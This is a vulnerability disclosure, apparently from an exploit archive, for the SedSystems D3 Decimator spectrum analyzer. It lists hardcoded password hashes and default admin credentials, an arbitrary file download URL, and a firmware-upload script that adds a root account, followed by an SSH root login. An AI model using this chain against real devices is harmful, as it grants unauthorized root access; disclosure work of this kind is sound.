Home / os / winmobile

SedSystems D3 Decimator Default Credentials / File Disclosure

Posted on 14 April 2017

SedSystems D3 Decimator Multiple Vulnerabilities ================================================ Identification of the vulnerable device can be performed by scanning for TCP port 9784 which offers a default remote API. When connected to this device it will announce itself with "connected" or similar: Connected to x.x.x.x. Escape character is '^]'. connected status status:3.1,3.0.12-1,0,0,41.0,Valid,Valid,540,-1.0,-1.0,5.1,11.4,-1.0 ping ping:ok The web service by default has a user interface for accessing the RF spectrum analyzer capability. The device itself from the API can give raw remote access to I/Q samples so can be used to remotely sniff the RF spectrum. The Web Configuration Manager can be found on "/cgi-bin/wcm.cgi". Multiple vulnerabilities exist. Hardcoded credentials can be found in the /etc/passwd files contained within the default firmware since at least February 2013. The following entries can be found: root:$1$zfy/fmyt$khz2yIyTFDoCkhxWw7eX8.:0:0:root:/:/bin/sh admin:$1$$CoERg7ynjYLsj2j4glJ34.:1000:0:root:/:/bin/webonly The admin user has a default password of "admin", at this time the root user password is unknown however there is no documented way of changing this trivially in a device. Using the "admin" user you can obtain a web session to the wcm.cgi and exploit a hidden arbitary file download vulnerability discovered by reverse engineering the firmware: http://x.x.x.x/cgi-bin/wcm.cgi?sessionid=009d45ecbabe015babe3300f&download=true&fullfilename=/etc/passwd This will allow you to download any file and as the "admin" user has root privileges you can obtain access to any file on the device. To execute arbitary code you can make use of a vulnerbaility within the firmware flash routines. By uploading a crafted tarball that contains a "install" script in its root, the device will accept your firmware and then attempt to execute ./install if found as root, you can then cancel the "flash" process to prevent bricking/modifcation of the device. The problem is due to /usr/bin/install_flash which after using "tar" to unpack an archive to a tmp folder of /tmp/PID_of_tar does the following: 80 # If the archive contained its own install script then use that 81 82 if [ -x ./install ]; then 83 ./install $all_args 84 rc=$? 85 exit $rc 86 fi 87 Using this vulnerability you can upload a .tar file containing an install file that looks like the following to obtain a root user account with adm1n/admin. cat install #!/bin/sh echo adm1n:$1$$CoERg7ynjYLsj2j4glJ34.:0:0:root:/:/bin/sh >> /etc/passwd You can then SSH remotely to the device as PermitRootLogin is enabled by default. E.g. $ ssh -l adm1n x.x.x.x adm1n@x.x.x.x's password: admin # uname -a Linux d3-decimator-540 2.6.34.10 #1 PREEMPT Wed Aug 8 10:04:25 CST 2012 armv5tejl GNU/Linux # cat /proc/cpuinfo Processor : ARM926EJ-S rev 4 (v5l) BogoMIPS : 103.83 Features : swp half thumb fastmult vfp edsp java CPU implementer : 0x41 CPU architecture: 5TEJ CPU variant : 0x0 CPU part : 0x926 CPU revision : 4 Hardware : SED 32XX Based CCA Revision : 0000 Serial : 0000000000000000 # Vendor website can be found at the following url: * http://www.sedsystems.ca/decimator_spectrum_analyzer -- prdelka

 

TOP